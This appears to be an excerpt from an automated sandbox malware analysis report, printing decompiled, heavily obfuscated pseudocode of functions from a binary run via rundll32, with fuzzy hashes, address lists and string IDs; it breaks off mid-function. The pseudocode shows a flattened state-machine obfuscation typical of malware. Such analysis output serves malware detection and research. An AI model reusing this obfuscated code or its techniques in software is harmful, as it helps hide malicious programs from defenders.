                                                                                                                          • Opcode Fuzzy Hash: f1ebdc49b849bf8c904815538ebaa2ee5cbb6585970c67cf9760e8e328c8f8b3
                                                                                                                          • Instruction Fuzzy Hash: D112307250C3808FD778DF25D88AA9BBBE2BBC5304F108A1DE5D986260D7B58949CF53
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E007981B7() {
                                                                                                                          				void* _t347;
                                                                                                                          				signed int _t350;
                                                                                                                          				signed int _t351;
                                                                                                                          				signed int _t353;
                                                                                                                          				signed int _t355;
                                                                                                                          				signed int _t360;
                                                                                                                          				signed int _t364;
                                                                                                                          				void* _t374;
                                                                                                                          				intOrPtr _t407;
                                                                                                                          				signed int _t411;
                                                                                                                          				signed int _t414;
                                                                                                                          				signed int _t415;
                                                                                                                          				signed int _t416;
                                                                                                                          				signed int _t417;
                                                                                                                          				signed int _t418;
                                                                                                                          				signed int _t419;
                                                                                                                          				signed int _t420;
                                                                                                                          				signed int* _t422;
                                                                                                                          				void* _t426;
                                                                                                                          
                                                                                                                          				 *(_t426 + 0x74) = 0xd212a7;
                                                                                                                          				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x52eac678;
                                                                                                                          				_t374 = 0xebf23c2;
                                                                                                                          				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x5238d4de;
                                                                                                                          				 *(_t426 + 0x20) = 0x60274e;
                                                                                                                          				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
                                                                                                                          				_t414 = 0x29;
                                                                                                                          				 *(_t426 + 0x34) =  *(_t426 + 0x20) / _t414;
                                                                                                                          				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0x7a4c;
                                                                                                                          				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0x00009fd0;
                                                                                                                          				 *(_t426 + 0x9c) = 0x5f71eb;
                                                                                                                          				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x01156387;
                                                                                                                          				 *(_t426 + 0x9c) =  *(_t426 + 0x9c) ^ 0x014a126f;
                                                                                                                          				 *(_t426 + 0x1c) = 0x8735e4;
                                                                                                                          				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 0xe;
                                                                                                                          				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 3;
                                                                                                                          				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) >> 4;
                                                                                                                          				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x000153b5;
                                                                                                                          				 *(_t426 + 0x58) = 0x9ed5c5;
                                                                                                                          				_t415 = 0x17;
                                                                                                                          				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) & 0x00000000;
                                                                                                                          				 *(_t426 + 0x54) =  *(_t426 + 0x58) * 0x5d;
                                                                                                                          				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0xb1e1bce9;
                                                                                                                          				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x88583d56;
                                                                                                                          				 *(_t426 + 0x5c) = 0x8fe0dc;
                                                                                                                          				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0xffff3edc;
                                                                                                                          				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t415;
                                                                                                                          				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x00095c01;
                                                                                                                          				 *(_t426 + 0x48) = 0x18253c;
                                                                                                                          				 *(_t426 + 0x48) =  *(_t426 + 0x48) + 0xf9f1;
                                                                                                                          				 *(_t426 + 0x48) =  *(_t426 + 0x48) << 7;
                                                                                                                          				 *(_t426 + 0x48) =  *(_t426 + 0x48) ^ 0x0c842cab;
                                                                                                                          				 *(_t426 + 0x94) = 0x40d4a3;
                                                                                                                          				 *(_t426 + 0x94) =  *(_t426 + 0x94) << 5;
                                                                                                                          				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x081e10bd;
                                                                                                                          				 *(_t426 + 0x20) = 0x8fc5ff;
                                                                                                                          				 *(_t426 + 0x20) =  *(_t426 + 0x20) >> 4;
                                                                                                                          				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0x245daa70;
                                                                                                                          				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xfc587561;
                                                                                                                          				 *(_t426 + 0x20) =  *(_t426 + 0x20) ^ 0xd80c07a2;
                                                                                                                          				 *(_t426 + 0x38) = 0x52431;
                                                                                                                          				 *(_t426 + 0x38) =  *(_t426 + 0x38) * 0x31;
                                                                                                                          				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa9954a0;
                                                                                                                          				 *(_t426 + 0x38) =  *(_t426 + 0x38) + 0xffff6dd1;
                                                                                                                          				 *(_t426 + 0x38) =  *(_t426 + 0x38) ^ 0xfa6f2662;
                                                                                                                          				 *(_t426 + 0x44) = 0xc4652;
                                                                                                                          				 *(_t426 + 0x44) =  *(_t426 + 0x44) + 0xffff61fe;
                                                                                                                          				 *(_t426 + 0x44) =  *(_t426 + 0x44) >> 4;
                                                                                                                          				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x0000c191;
                                                                                                                          				 *(_t426 + 0x10) = 0x2c06e;
                                                                                                                          				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xffffb3fc;
                                                                                                                          				 *(_t426 + 0x10) =  *(_t426 + 0x10) * 0x27;
                                                                                                                          				 *(_t426 + 0x10) =  *(_t426 + 0x10) + 0xbfb5;
                                                                                                                          				 *(_t426 + 0x10) =  *(_t426 + 0x10) ^ 0x00679be9;
                                                                                                                          				 *(_t426 + 0x7c) = 0xc3ec9d;
                                                                                                                          				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) << 7;
                                                                                                                          				 *(_t426 + 0x7c) =  *(_t426 + 0x7c) ^ 0x61f5edc1;
                                                                                                                          				 *(_t426 + 0x70) = 0x3416d6;
                                                                                                                          				 *(_t426 + 0x70) =  *(_t426 + 0x70) << 3;
                                                                                                                          				 *(_t426 + 0x70) =  *(_t426 + 0x70) ^ 0x01aaf790;
                                                                                                                          				 *(_t426 + 0x64) = 0x1e8df6;
                                                                                                                          				 *(_t426 + 0x64) =  *(_t426 + 0x64) | 0x232ea122;
                                                                                                                          				 *(_t426 + 0x64) =  *(_t426 + 0x64) * 0x6c;
                                                                                                                          				 *(_t426 + 0x64) =  *(_t426 + 0x64) ^ 0xde707d95;
                                                                                                                          				 *(_t426 + 0x28) = 0xebc79e;
                                                                                                                          				 *(_t426 + 0x28) =  *(_t426 + 0x28) | 0xfe2cd41a;
                                                                                                                          				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xffff955f;
                                                                                                                          				 *(_t426 + 0x28) =  *(_t426 + 0x28) + 0xf79a;
                                                                                                                          				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xfef90bb7;
                                                                                                                          				 *(_t426 + 0x4c) = 0x6795aa;
                                                                                                                          				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) >> 5;
                                                                                                                          				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) + 0xffffddd4;
                                                                                                                          				 *(_t426 + 0x4c) =  *(_t426 + 0x4c) ^ 0x0005ee09;
                                                                                                                          				 *(_t426 + 0x50) = 0xbc4be8;
                                                                                                                          				 *(_t426 + 0x50) =  *(_t426 + 0x50) ^ 0xc40dbfb1;
                                                                                                                          				_t416 = 0x6f;
                                                                                                                          				 *(_t426 + 0x54) =  *(_t426 + 0x50) * 0x3a;
                                                                                                                          				 *(_t426 + 0x54) =  *(_t426 + 0x54) ^ 0x9054da47;
                                                                                                                          				 *(_t426 + 0x94) = 0xde468f;
                                                                                                                          				 *(_t426 + 0x94) =  *(_t426 + 0x94) + 0xffff1011;
                                                                                                                          				 *(_t426 + 0x94) =  *(_t426 + 0x94) ^ 0x00dd868e;
                                                                                                                          				 *(_t426 + 0x18) = 0x6e4fa6;
                                                                                                                          				 *(_t426 + 0x18) =  *(_t426 + 0x18) >> 8;
                                                                                                                          				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x937c1de8;
                                                                                                                          				 *(_t426 + 0x18) =  *(_t426 + 0x18) | 0x0d58262f;
                                                                                                                          				 *(_t426 + 0x18) =  *(_t426 + 0x18) ^ 0x9f7b4471;
                                                                                                                          				 *(_t426 + 0x5c) = 0xc77145;
                                                                                                                          				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) + 0x9c58;
                                                                                                                          				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) / _t416;
                                                                                                                          				 *(_t426 + 0x5c) =  *(_t426 + 0x5c) ^ 0x0006cc79;
                                                                                                                          				 *(_t426 + 0x44) = 0x492c53;
                                                                                                                          				 *(_t426 + 0x44) =  *(_t426 + 0x44) | 0x932025a2;
                                                                                                                          				 *(_t426 + 0x44) =  *(_t426 + 0x44) << 0xb;
                                                                                                                          				 *(_t426 + 0x44) =  *(_t426 + 0x44) ^ 0x496991d6;
                                                                                                                          				 *(_t426 + 0xa0) = 0x27589;
                                                                                                                          				_t417 = 0x3e;
                                                                                                                          				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) * 0x6d;
                                                                                                                          				 *(_t426 + 0xa0) =  *(_t426 + 0xa0) ^ 0x010c563c;
                                                                                                                          				 *(_t426 + 0x30) = 0xb4bbc8;
                                                                                                                          				 *(_t426 + 0x30) =  *(_t426 + 0x30) / _t417;
                                                                                                                          				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0xffff42d9;
                                                                                                                          				 *(_t426 + 0x30) =  *(_t426 + 0x30) + 0x5120;
                                                                                                                          				 *(_t426 + 0x30) =  *(_t426 + 0x30) ^ 0x000b6c85;
                                                                                                                          				 *(_t426 + 0x28) = 0xdf5b34;
                                                                                                                          				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0xb2734269;
                                                                                                                          				_t418 = 0x5e;
                                                                                                                          				 *(_t426 + 0x28) =  *(_t426 + 0x28) / _t418;
                                                                                                                          				 *(_t426 + 0x28) =  *(_t426 + 0x28) << 6;
                                                                                                                          				 *(_t426 + 0x28) =  *(_t426 + 0x28) ^ 0x79ab34c2;
                                                                                                                          				 *(_t426 + 0x90) = 0xff684d;
                                                                                                                          				 *(_t426 + 0x90) =  *(_t426 + 0x90) | 0x9d6c2ae6;
                                                                                                                          				 *(_t426 + 0x90) =  *(_t426 + 0x90) ^ 0x9df0e455;
                                                                                                                          				 *(_t426 + 0x20) = 0x90e304;
                                                                                                                          				_t419 = 0x7f;
                                                                                                                          				 *(_t426 + 0x1c) =  *(_t426 + 0x20) / _t419;
                                                                                                                          				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 6;
                                                                                                                          				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) << 0x10;
                                                                                                                          				 *(_t426 + 0x1c) =  *(_t426 + 0x1c) ^ 0x0384731e;
                                                                                                                          				 *(_t426 + 0x60) = 0xa4eb1a;
                                                                                                                          				 *(_t426 + 0x60) =  *(_t426 + 0x60) << 0xc;
                                                                                                                          				 *(_t426 + 0x60) =  *(_t426 + 0x60) * 0x76;
                                                                                                                          				 *(_t426 + 0x60) =  *(_t426 + 0x60) ^ 0x45d23c3b;
                                                                                                                          				 *(_t426 + 0x34) = 0xdaab0d;
                                                                                                                          				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 0xb;
                                                                                                                          				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
                                                                                                                          				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
                                                                                                                          				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
                                                                                                                          				 *(_t426 + 0x68) = 0xbbaf5f;
                                                                                                                          				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
                                                                                                                          				_t372 =  *(_t426 + 0x6c);
                                                                                                                          				_t411 =  *(_t426 + 0x6c);
                                                                                                                          				_t424 =  *(_t426 + 0x6c);
                                                                                                                          				_t420 =  *(_t426 + 0x6c);
                                                                                                                          				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
                                                                                                                          				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
                                                                                                                          				 *(_t426 + 0x74) = 0xfd4b1c;
                                                                                                                          				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
                                                                                                                          				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
                                                                                                                          				 *(_t426 + 0x88) = 0xbb9d8e;
                                                                                                                          				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
                                                                                                                          				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
                                                                                                                          				 *(_t426 + 0x3c) = 0x9303e6;
                                                                                                                          				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
                                                                                                                          				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
                                                                                                                          				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
                                                                                                                          				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
                                                                                                                          				 *(_t426 + 0x80) = 0xaf4918;
                                                                                                                          				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
                                                                                                                          				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
                                                                                                                          				 *(_t426 + 0x78) = 0xd8d1b1;
                                                                                                                          				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
                                                                                                                          				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t347 = 0xfb52c5;
                                                                                                                          					L2:
                                                                                                                          					while(_t374 != 0xd963e9) {
                                                                                                                          						if(_t374 == _t347) {
                                                                                                                          							_t350 = E007AC264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
                                                                                                                          							_t426 = _t426 + 0x2c;
                                                                                                                          							__eflags = _t350;
                                                                                                                          							if(_t350 == 0) {
                                                                                                                          								_t351 =  *(_t426 + 0xa0);
                                                                                                                          							} else {
                                                                                                                          								_t422 = _t411;
                                                                                                                          								while(1) {
                                                                                                                          									__eflags = _t422[1] - 4;
                                                                                                                          									if(_t422[1] != 4) {
                                                                                                                          										goto L20;
                                                                                                                          									}
                                                                                                                          									L19:
                                                                                                                          									_t355 = E0079B23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
                                                                                                                          									_t426 = _t426 + 0x10;
                                                                                                                          									__eflags = _t355;
                                                                                                                          									if(_t355 == 0) {
                                                                                                                          										_t351 = 1;
                                                                                                                          										 *(_t426 + 0xa0) = 1;
                                                                                                                          									} else {
                                                                                                                          										goto L20;
                                                                                                                          									}
                                                                                                                          									L25:
                                                                                                                          									_t420 =  *(_t426 + 0x6c);
                                                                                                                          									goto L26;
                                                                                                                          									L20:
                                                                                                                          									_t353 =  *_t422;
                                                                                                                          									__eflags = _t353;
                                                                                                                          									if(_t353 == 0) {
                                                                                                                          										_t351 =  *(_t426 + 0xa0);
                                                                                                                          									} else {
                                                                                                                          										_t422 = _t422 + _t353;
                                                                                                                          										__eflags = _t422[1] - 4;
                                                                                                                          										if(_t422[1] != 4) {
                                                                                                                          											goto L20;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          									goto L25;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L26:
                                                                                                                          							__eflags = _t351;
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								_t347 = 0xfb52c5;
                                                                                                                          								_t374 = 0xfb52c5;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								_t407 =  *0x7b3e0c; // 0x0
                                                                                                                          								E007A458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
                                                                                                                          								_t374 = 0xd963e9;
                                                                                                                          								goto L1;
                                                                                                                          							}
                                                                                                                          							L32:
                                                                                                                          						} else {
                                                                                                                          							if(_t374 == 0x247652d) {
                                                                                                                          								_t360 = E00798F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
                                                                                                                          								_t372 = _t360;
                                                                                                                          								_t426 = _t426 + 0x28;
                                                                                                                          								__eflags = _t360 - 0xffffffff;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_t374 = 0x7db0050;
                                                                                                                          									while(1) {
                                                                                                                          										L1:
                                                                                                                          										_t347 = 0xfb52c5;
                                                                                                                          										goto L2;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_t374 == 0x4334ccc) {
                                                                                                                          									E007ADA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
                                                                                                                          									_t364 = E0079B6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
                                                                                                                          									_t424 = _t364;
                                                                                                                          									_t426 = _t426 + 0x18;
                                                                                                                          									_t374 = 0x247652d;
                                                                                                                          									 *((short*)(_t364 - 2)) = 0;
                                                                                                                          									while(1) {
                                                                                                                          										L1:
                                                                                                                          										_t347 = 0xfb52c5;
                                                                                                                          										goto L2;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									if(_t374 == 0x7db0050) {
                                                                                                                          										_t420 = 0x1000;
                                                                                                                          										_push(_t374);
                                                                                                                          										_push(_t374);
                                                                                                                          										 *(_t426 + 0x74) = 0x1000;
                                                                                                                          										_t411 = E00797FF2(0x1000);
                                                                                                                          										_t347 = 0xfb52c5;
                                                                                                                          										__eflags = _t411;
                                                                                                                          										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										if(_t374 == 0xebf23c2) {
                                                                                                                          											_t374 = 0x4334ccc;
                                                                                                                          											continue;
                                                                                                                          										} else {
                                                                                                                          											if(_t374 != 0xf828486) {
                                                                                                                          												L30:
                                                                                                                          												__eflags = _t374 - 0x24bb42a;
                                                                                                                          												if(__eflags != 0) {
                                                                                                                          													continue;
                                                                                                                          												} else {
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												E007A1E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						return 0;
                                                                                                                          						goto L32;
                                                                                                                          					}
                                                                                                                          					E007A8519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
                                                                                                                          					_t374 = 0xf828486;
                                                                                                                          					_t347 = 0xfb52c5;
                                                                                                                          					goto L30;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          0x00798338
                                                                                                                          0x00798340
                                                                                                                          0x00798348
                                                                                                                          0x00798355
                                                                                                                          0x00798359
                                                                                                                          0x00798361
                                                                                                                          0x00798369
                                                                                                                          0x00798371
                                                                                                                          0x00798376
                                                                                                                          0x0079837e
                                                                                                                          0x00798386
                                                                                                                          0x0079838b
                                                                                                                          0x00798393
                                                                                                                          0x0079839b
                                                                                                                          0x007983a8
                                                                                                                          0x007983ac
                                                                                                                          0x007983b4
                                                                                                                          0x007983bc
                                                                                                                          0x007983c6
                                                                                                                          0x007983ce
                                                                                                                          0x007983d6
                                                                                                                          0x007983de
                                                                                                                          0x007983e6
                                                                                                                          0x007983eb
                                                                                                                          0x007983f3
                                                                                                                          0x007983fb
                                                                                                                          0x00798403
                                                                                                                          0x00798412
                                                                                                                          0x00798415
                                                                                                                          0x00798419
                                                                                                                          0x00798421
                                                                                                                          0x0079842c
                                                                                                                          0x00798437
                                                                                                                          0x00798442
                                                                                                                          0x0079844a
                                                                                                                          0x0079844f
                                                                                                                          0x00798457
                                                                                                                          0x0079845f
                                                                                                                          0x00798467
                                                                                                                          0x0079846f
                                                                                                                          0x0079847f
                                                                                                                          0x00798483
                                                                                                                          0x0079848b
                                                                                                                          0x00798493
                                                                                                                          0x0079849b
                                                                                                                          0x007984a0
                                                                                                                          0x007984a8
                                                                                                                          0x007984bb
                                                                                                                          0x007984be
                                                                                                                          0x007984c5
                                                                                                                          0x007984d0
                                                                                                                          0x007984e0
                                                                                                                          0x007984e4
                                                                                                                          0x007984ec
                                                                                                                          0x007984f4
                                                                                                                          0x007984fc
                                                                                                                          0x00798504
                                                                                                                          0x00798510
                                                                                                                          0x00798515
                                                                                                                          0x0079851b
                                                                                                                          0x00798520
                                                                                                                          0x00798528
                                                                                                                          0x00798533
                                                                                                                          0x0079853e
                                                                                                                          0x00798549
                                                                                                                          0x00798555
                                                                                                                          0x00798558
                                                                                                                          0x0079855c
                                                                                                                          0x00798561
                                                                                                                          0x00798566
                                                                                                                          0x0079856e
                                                                                                                          0x00798576
                                                                                                                          0x00798580
                                                                                                                          0x00798584
                                                                                                                          0x0079858c
                                                                                                                          0x00798594
                                                                                                                          0x00798599
                                                                                                                          0x007985a1
                                                                                                                          0x007985a6
                                                                                                                          0x007985ae
                                                                                                                          0x007985b6
                                                                                                                          0x007985c0
                                                                                                                          0x007985c4
                                                                                                                          0x007985c8
                                                                                                                          0x007985cc
                                                                                                                          0x007985d0
                                                                                                                          0x007985d4
                                                                                                                          0x007985dc
                                                                                                                          0x007985e4
                                                                                                                          0x007985ec
                                                                                                                          0x007985f4
                                                                                                                          0x00798607
                                                                                                                          0x0079860e
                                                                                                                          0x00798619
                                                                                                                          0x00798621
                                                                                                                          0x00798626
                                                                                                                          0x00798633
                                                                                                                          0x00798637
                                                                                                                          0x0079863f
                                                                                                                          0x0079864a
                                                                                                                          0x00798655
                                                                                                                          0x00798660
                                                                                                                          0x0079866d
                                                                                                                          0x00798671
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00000000
                                                                                                                          0x0079867e
                                                                                                                          0x0079868c
                                                                                                                          0x00798806
                                                                                                                          0x0079880b
                                                                                                                          0x0079880e
                                                                                                                          0x00798810
                                                                                                                          0x00798854
                                                                                                                          0x00798812
                                                                                                                          0x00798812
                                                                                                                          0x00798814
                                                                                                                          0x00798814
                                                                                                                          0x00798818
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0079881a
                                                                                                                          0x00798832
                                                                                                                          0x00798837
                                                                                                                          0x0079883a
                                                                                                                          0x0079883c
                                                                                                                          0x0079884a
                                                                                                                          0x0079884b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00798864
                                                                                                                          0x00798864
                                                                                                                          0x00000000
                                                                                                                          0x0079883e
                                                                                                                          0x0079883e
                                                                                                                          0x00798840
                                                                                                                          0x00798842
                                                                                                                          0x0079885d
                                                                                                                          0x00798844
                                                                                                                          0x00798844
                                                                                                                          0x00798814
                                                                                                                          0x00798818
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00798818
                                                                                                                          0x00000000
                                                                                                                          0x00798842
                                                                                                                          0x00798814
                                                                                                                          0x00798868
                                                                                                                          0x00798868
                                                                                                                          0x0079886a
                                                                                                                          0x0079888d
                                                                                                                          0x00798892
                                                                                                                          0x00000000
                                                                                                                          0x0079886c
                                                                                                                          0x00798870
                                                                                                                          0x0079887d
                                                                                                                          0x00798883
                                                                                                                          0x00000000
                                                                                                                          0x00798883
                                                                                                                          0x00000000
                                                                                                                          0x00798692
                                                                                                                          0x00798698
                                                                                                                          0x007987b9
                                                                                                                          0x007987be
                                                                                                                          0x007987c0
                                                                                                                          0x007987c3
                                                                                                                          0x007987c6
                                                                                                                          0x007987cc
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00000000
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x0079869e
                                                                                                                          0x007986a4
                                                                                                                          0x0079874a
                                                                                                                          0x00798765
                                                                                                                          0x0079876a
                                                                                                                          0x0079876c
                                                                                                                          0x00798771
                                                                                                                          0x00798776
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00798679
                                                                                                                          0x00000000
                                                                                                                          0x00798679
                                                                                                                          0x007986aa
                                                                                                                          0x007986b0
                                                                                                                          0x007986ff
                                                                                                                          0x0079870e
                                                                                                                          0x0079870f
                                                                                                                          0x00798710
                                                                                                                          0x0079871a
                                                                                                                          0x0079871c
                                                                                                                          0x00798722
                                                                                                                          0x00798729
                                                                                                                          0x00000000
                                                                                                                          0x007986b2
                                                                                                                          0x007986b8
                                                                                                                          0x007986f4
                                                                                                                          0x00000000
                                                                                                                          0x007986ba
                                                                                                                          0x007986c0
                                                                                                                          0x007988b2
                                                                                                                          0x007988b2

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                          • API String ID: 0-1837206032
                                                                                                                          • Opcode ID: a6ebbe10d6c9e5c934b6c191451ab6ece629bcfefee9ac55846a48cf8a9f39ce
                                                                                                                          • Instruction ID: 1255439cfa22f6731b2b69349b8b4597b76837b0087b9a4c75a842979bc25a6c
                                                                                                                          • Opcode Fuzzy Hash: a6ebbe10d6c9e5c934b6c191451ab6ece629bcfefee9ac55846a48cf8a9f39ce
                                                                                                                          • Instruction Fuzzy Hash: E50231711083809FD7A8CF25C48AA5BBBE1FBC5758F508A1DF1DA86260DBB48949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 79%
                                                                                                                          			E007ACB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                          				char _v520;
                                                                                                                          				char _v1040;
                                                                                                                          				char _v1560;
                                                                                                                          				intOrPtr _v1564;
                                                                                                                          				intOrPtr _v1568;
                                                                                                                          				intOrPtr _v1572;
                                                                                                                          				signed int _v1576;
                                                                                                                          				signed int _v1580;
                                                                                                                          				signed int _v1584;
                                                                                                                          				signed int _v1588;
                                                                                                                          				signed int _v1592;
                                                                                                                          				signed int _v1596;
                                                                                                                          				signed int _v1600;
                                                                                                                          				signed int _v1604;
                                                                                                                          				signed int _v1608;
                                                                                                                          				signed int _v1612;
                                                                                                                          				signed int _v1616;
                                                                                                                          				signed int _v1620;
                                                                                                                          				signed int _v1624;
                                                                                                                          				signed int _v1628;
                                                                                                                          				signed int _v1632;
                                                                                                                          				signed int _v1636;
                                                                                                                          				signed int _v1640;
                                                                                                                          				signed int _v1644;
                                                                                                                          				signed int _v1648;
                                                                                                                          				signed int _v1652;
                                                                                                                          				signed int _v1656;
                                                                                                                          				signed int _v1660;
                                                                                                                          				signed int _v1664;
                                                                                                                          				signed int _v1668;
                                                                                                                          				signed int _v1672;
                                                                                                                          				signed int _v1676;
                                                                                                                          				signed int _v1680;
                                                                                                                          				signed int _v1684;
                                                                                                                          				signed int _v1688;
                                                                                                                          				signed int _v1692;
                                                                                                                          				signed int _v1696;
                                                                                                                          				signed int _v1700;
                                                                                                                          				signed int _v1704;
                                                                                                                          				signed int _v1708;
                                                                                                                          				void* _t341;
                                                                                                                          				void* _t370;
                                                                                                                          				void* _t379;
                                                                                                                          				intOrPtr _t382;
                                                                                                                          				intOrPtr _t385;
                                                                                                                          				void* _t396;
                                                                                                                          				intOrPtr _t399;
                                                                                                                          				intOrPtr _t436;
                                                                                                                          				signed int _t437;
                                                                                                                          				signed int _t438;
                                                                                                                          				signed int _t439;
                                                                                                                          				signed int _t440;
                                                                                                                          				signed int _t441;
                                                                                                                          				signed int _t442;
                                                                                                                          				signed int _t443;
                                                                                                                          				signed int _t444;
                                                                                                                          				signed int* _t449;
                                                                                                                          
                                                                                                                          				_push(_a12);
                                                                                                                          				_t436 = 0;
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(0);
                                                                                                                          				E007A20B9(_t341);
                                                                                                                          				_v1572 = 0xe82680;
                                                                                                                          				_t449 =  &(( &_v1708)[5]);
                                                                                                                          				_v1568 = 0;
                                                                                                                          				_v1564 = 0;
                                                                                                                          				_t396 = 0x9368da1;
                                                                                                                          				_v1584 = 0x42403b;
                                                                                                                          				_v1584 = _v1584 + 0xffffd771;
                                                                                                                          				_v1584 = _v1584 ^ 0x00421785;
                                                                                                                          				_v1692 = 0xc00255;
                                                                                                                          				_t437 = 0x16;
                                                                                                                          				_v1692 = _v1692 / _t437;
